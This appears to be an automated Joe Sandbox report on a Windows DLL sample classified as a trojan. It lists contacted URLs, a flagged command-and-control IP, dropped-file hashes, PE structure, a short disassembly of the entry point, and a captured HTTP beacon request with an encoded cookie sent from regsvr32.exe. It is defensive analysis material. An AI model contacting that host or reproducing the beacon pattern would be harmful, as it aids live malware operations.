                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001D.00000003.594537232.00000229065A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.594593800.0000022906586000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.317649151.000001E56064C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressingsvchost.exe, 0000000F.00000002.604533057.0000029768EB1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.603717973.0000029768EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://dynamic.tsvchost.exe, 0000000A.00000002.317619964.000001E560629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://disneyplus.com/legal.svchost.exe, 0000001D.00000003.594537232.00000229065A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.594593800.0000022906586000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317619964.000001E560629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000002.317649151.000001E56064C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://activity.windows.comsvchost.exe, 00000008.00000002.664253267.000001F55C43E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://help.disneyplus.com.svchost.exe, 0000001D.00000003.594537232.00000229065A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.594593800.0000022906586000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.664253267.000001F55C43E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  low
                                                                                                  https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.317649151.000001E56064C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      23.239.0.12
                                                                                                      unknownUnited States
                                                                                                      63949LINODE-APLinodeLLCUStrue
                                                                                                      IP
                                                                                                      127.0.0.1
                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                      Analysis ID:626488
                                                                                                      Start date and time: 14/05/202204:55:322022-05-14 04:55:32 +02:00
                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                      Overall analysis duration:0h 9m 57s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:light
                                                                                                      Sample file name:TSvDnT6fkE.dll
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                      Run name:Run with higher sleep bypass
                                                                                                      Number of analysed new started processes analysed:32
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • HDC enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Detection:MAL
                                                                                                      Classification:mal80.troj.evad.winDLL@28/6@0/2
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HDC Information:Failed
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 99%
                                                                                                      • Number of executed functions: 0
                                                                                                      • Number of non-executed functions: 0
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .dll
                                                                                                      • Adjust boot time
                                                                                                      • Enable AMSI
                                                                                                      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.223.24.244
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      TimeTypeDescription
                                                                                                      04:57:17API Interceptor1x Sleep call for process: svchost.exe modified
                                                                                                      04:58:13API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                      No context
                                                                                                      No context
                                                                                                      No context
                                                                                                      No context
                                                                                                      No context
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8192
                                                                                                      Entropy (8bit):0.3593198815979092
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                      MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                      SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                      SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                      SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                      Malicious:false
                                                                                                      Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:MPEG-4 LOAS
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1310720
                                                                                                      Entropy (8bit):0.24945876525214639
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU48:BJiRdwfu2SRU48
                                                                                                      MD5:747B98FCF7A4D628741CB5A52FE6E3EA
                                                                                                      SHA1:EF42103518B4BA7BEEF637F5E3425686147427B6
                                                                                                      SHA-256:B28C623D3B576C556539BE1FDBF0D4DB897AE6012AF36DC5859866839C06693C
                                                                                                      SHA-512:B1770923A46B97788BF6C956EE75E673402103F896F6C88A8CC4362ECBA1D98AAC033D4DF9429DF1E5D612450AE3BD5585B8F12C4CE052302436A693DEEF2DCE
                                                                                                      Malicious:false
                                                                                                      Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x97040d86, page size 16384, Windows version 10.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):786432
                                                                                                      Entropy (8bit):0.2506312880215153
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:Trc+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TrDSB2nSB2RSjlK/+mLesOj1J2
                                                                                                      MD5:DA2103B9DC96D765BA6783330B18F786
                                                                                                      SHA1:8F3DC28F37402D0048CEFC159C3AE1010DF6F04A
                                                                                                      SHA-256:FC16279172F7FC94BCEEB0C01813AD33BCD4CB7DC5FAB0C61694278310CC0A7E
                                                                                                      SHA-512:6ED1CD30EB7B740A055174645735F71B54AFF3751ED323FEC43F901A97F2039948C3CA855ED5930DC6E7A7B0166162C5FA5DE3E1C33659411059888D8AA3A858
                                                                                                      Malicious:false
                                                                                                      Preview:....... ................e.f.3...w........................)......;...zm..9...z..h.(......;...zm...)..............3...w...........................................................................................................B...........@...................................................................................................... ...................................................................................................................................................................................................................................................qj...;...zm......................;...zm.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16384
                                                                                                      Entropy (8bit):0.0773440308057626
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:EllR7v0c0kU/l/liA0fcq0TlltlJ0/l/loll3Vkttlmlnl:EZr0cam43
                                                                                                      MD5:69CB968075355F7CB88579740010B841
                                                                                                      SHA1:56588CF0A70946DF1EB998632643512A6DEBC8C0
                                                                                                      SHA-256:9AA6AD2AA7BB7D28273E366F01ACCAD1EED2BB98EA93D683F20C0AE9742F6A6A
                                                                                                      SHA-512:B687AA9AFF630D50AA8157994028503720CF41AF52668EB607D8E4864932B036956EC4E4C1FF23F035CDDB5F81818E3B7149DB7E30F14B2EE7BCF6290383942F
                                                                                                      Malicious:false
                                                                                                      Preview:1^.......................................3...w...9...z...;...zm..........;...zm..;...zm."R.!.;...z)......................;...zm.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):55
                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                      Malicious:false
                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):10844
                                                                                                      Entropy (8bit):3.16254980646967
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:cY+38+DJM+i2Jt+iDQ+yw+f0+rU+0Jtk+EOtF+E7tC+Ewl+6:j+s+i+Z+z+B+c+Y+0g+J+j+h+6
                                                                                                      MD5:FE2B3B2FBC9CB518849F4EDE474EDE06
                                                                                                      SHA1:93A2D531308048F3F6E03EB0227D911D99C4238A
                                                                                                      SHA-256:8F176550E5BC309FF6FB914216B174DB26A8F5281331284A8EA7002BA908F56F
                                                                                                      SHA-512:9E621D766C4FCCD58F3B457FC45A359E169B92CCB7D01858CDC81A63F9D5E4E86C3709D53BC67CED0E1BDC6EE10F5A8BFB27802CA668FF7452621A914983EE48
                                                                                                      Malicious:false
                                                                                                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                      File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                      Entropy (8bit):6.482071422878548
                                                                                                      TrID:
                                                                                                      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                      • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                      • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                      • DOS Executable Generic (2002/1) 1.70%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                      File name:TSvDnT6fkE.dll
                                                                                                      File size:545280
                                                                                                      MD5:81fbd732b50a5593d32234e232d59ece
                                                                                                      SHA1:4e0d8774739060edf16cb1956934840bc8e9a55a
                                                                                                      SHA256:6aaf58cdff2d8c1a9f8ca6caaa1445d2574dcec8b25ef57c050ce3e688e06b5d
                                                                                                      SHA512:e512fc9fde6bf9ec20cd4c58aa34e8a3bffcd2e8b030a0ae4bba5f92c7267a09bf37a0f0de31a0b0064fecaa862a28c9343b5453477e3a81aea090e3b4b9fc19
                                                                                                      SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZyHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNV2
                                                                                                      TLSH:E5C4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."
                                                                                                      Icon Hash:74f0e4ecccdce0e4
                                                                                                      Entrypoint:0x1800423a8
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x180000000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:2
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:2
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:2
                                                                                                      Import Hash:b268dbaa2e6eb6acd16e04d482356598
                                                                                                      Instruction
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+08h], ebx
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+10h], esi
                                                                                                      push edi
                                                                                                      dec eax
                                                                                                      sub esp, 20h
                                                                                                      dec ecx
                                                                                                      mov edi, eax
                                                                                                      mov ebx, edx
                                                                                                      dec eax
                                                                                                      mov esi, ecx
                                                                                                      cmp edx, 01h
                                                                                                      jne 00007FA994C38477h
                                                                                                      call 00007FA994C3A604h
                                                                                                      dec esp
                                                                                                      mov eax, edi
                                                                                                      mov edx, ebx
                                                                                                      dec eax
                                                                                                      mov ecx, esi
                                                                                                      dec eax
                                                                                                      mov ebx, dword ptr [esp+30h]
                                                                                                      dec eax
                                                                                                      mov esi, dword ptr [esp+38h]
                                                                                                      dec eax
                                                                                                      add esp, 20h
                                                                                                      pop edi
                                                                                                      jmp 00007FA994C38320h
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+08h], ecx
                                                                                                      dec eax
                                                                                                      sub esp, 00000088h
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [00014D05h]
                                                                                                      call dword ptr [0000FC7Fh]
                                                                                                      dec esp
                                                                                                      mov ebx, dword ptr [00014DF0h]
                                                                                                      dec esp
                                                                                                      mov dword ptr [esp+58h], ebx
                                                                                                      inc ebp
                                                                                                      xor eax, eax
                                                                                                      dec eax
                                                                                                      lea edx, dword ptr [esp+60h]
                                                                                                      dec eax
                                                                                                      mov ecx, dword ptr [esp+58h]
                                                                                                      call 00007FA994C46FFAh
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+50h], eax
                                                                                                      dec eax
                                                                                                      cmp dword ptr [esp+50h], 00000000h
                                                                                                      je 00007FA994C384B3h
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+38h], 00000000h
                                                                                                      dec eax
                                                                                                      lea eax, dword ptr [esp+48h]
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+30h], eax
                                                                                                      dec eax
                                                                                                      lea eax, dword ptr [esp+40h]
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+28h], eax
                                                                                                      dec eax
                                                                                                      lea eax, dword ptr [00014CB0h]
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+20h], eax
                                                                                                      dec esp
                                                                                                      mov ecx, dword ptr [esp+50h]
                                                                                                      dec esp
                                                                                                      mov eax, dword ptr [esp+58h]
                                                                                                      dec eax
                                                                                                      mov edx, dword ptr [esp+60h]
                                                                                                      xor ecx, ecx
                                                                                                      call 00007FA994C46FA8h
                                                                                                      jmp 00007FA994C38494h
                                                                                                      dec eax
                                                                                                      mov eax, dword ptr [eax+eax+00000000h]
                                                                                                      Programming Language:
                                                                                                      • [ C ] VS2008 build 21022
                                                                                                      • [LNK] VS2008 build 21022
                                                                                                      • [ASM] VS2008 build 21022
                                                                                                      • [IMP] VS2005 build 50727
                                                                                                      • [RES] VS2008 build 21022
                                                                                                      • [EXP] VS2008 build 21022
                                                                                                      • [C++] VS2008 build 21022
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x55cf00x6f.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5544c0x3c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x2dffc.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x590000xe1c.pdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x1d8.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x520000x288.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x504ca0x50600False0.389081940124zlib compressed data5.26882252971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x520000x3d5f0x3e00False0.355405745968data5.39402464003IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x560000x20d80x1200False0.180772569444data2.18161586025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .pdata0x590000xe1c0x1000False0.44580078125data4.98556265168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x5a0000x2dffc0x2e000False0.839408542799data7.73448363752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x880000x6f80x800False0.1796875data1.81179169858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_RCDATA0x5a0a00x2de00dataEnglishUnited States
                                                                                                      RT_MANIFEST0x87ea00x15aASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                      DLLImport
                                                                                                      KERNEL32.dllExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
                                                                                                      ole32.dllCoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc
                                                                                                      NameOrdinalAddress
                                                                                                      DllRegisterServer10x180042050
                                                                                                      DllUnregisterServer20x180042080
                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      May 14, 2022 04:57:34.447259903 CEST49768443192.168.2.423.239.0.12
                                                                                                      May 14, 2022 04:57:34.447320938 CEST4434976823.239.0.12192.168.2.4
                                                                                                      May 14, 2022 04:57:34.447426081 CEST49768443192.168.2.423.239.0.12
                                                                                                      May 14, 2022 04:57:34.468772888 CEST49768443192.168.2.423.239.0.12
                                                                                                      May 14, 2022 04:57:34.468808889 CEST4434976823.239.0.12192.168.2.4
                                                                                                      May 14, 2022 04:57:35.017690897 CEST4434976823.239.0.12192.168.2.4
                                                                                                      May 14, 2022 04:57:35.017879009 CEST49768443192.168.2.423.239.0.12
                                                                                                      May 14, 2022 04:57:35.524064064 CEST49768443192.168.2.423.239.0.12
                                                                                                      May 14, 2022 04:57:35.524107933 CEST4434976823.239.0.12192.168.2.4
                                                                                                      May 14, 2022 04:57:35.524662971 CEST4434976823.239.0.12192.168.2.4
                                                                                                      May 14, 2022 04:57:35.524800062 CEST49768443192.168.2.423.239.0.12
                                                                                                      May 14, 2022 04:57:35.547240019 CEST49768443192.168.2.423.239.0.12
                                                                                                      May 14, 2022 04:57:35.588527918 CEST4434976823.239.0.12192.168.2.4
                                                                                                      May 14, 2022 04:57:36.392389059 CEST4434976823.239.0.12192.168.2.4
                                                                                                      May 14, 2022 04:57:36.392540932 CEST49768443192.168.2.423.239.0.12
                                                                                                      May 14, 2022 04:57:36.392571926 CEST4434976823.239.0.12192.168.2.4
                                                                                                      May 14, 2022 04:57:36.392651081 CEST49768443192.168.2.423.239.0.12
                                                                                                      May 14, 2022 04:57:36.392683983 CEST4434976823.239.0.12192.168.2.4
                                                                                                      May 14, 2022 04:57:36.392752886 CEST49768443192.168.2.423.239.0.12
                                                                                                      May 14, 2022 04:57:36.394860983 CEST49768443192.168.2.423.239.0.12
                                                                                                      May 14, 2022 04:57:36.394906044 CEST4434976823.239.0.12192.168.2.4
                                                                                                      • 23.239.0.12
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.44976823.239.0.12443C:\Windows\System32\regsvr32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2022-05-14 02:57:35 UTC0OUTGET / HTTP/1.1
                                                                                                      Cookie: QRIFweiGKVI=h7VegJdmf4xfFFY0QYrxZdstx2kYWXdTstAUTv1fb+WsjLhO8tel9R7uFuWFo2xXJHDd3gjQ6kH0iMy9uU8gc4ZYIxUoNhr5xDSF6nCBjAWyOhB4Utfg5CPFQewAuYEt9x47MOitgo8o4jp+h4lcVMyxOmpNT6WAdcmNzkO1ggkYOdyn6AMcQmNQd52VrPXXGfml0S5M/DuKlS9S14SJSjRbstms/WbaagCawUx6mENt/agbYDUjWaaNo2J5C70=
                                                                                                      Host: 23.239.0.12
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2022-05-14 02:57:36 UTC0INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Sat, 14 May 2022 02:57:36 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
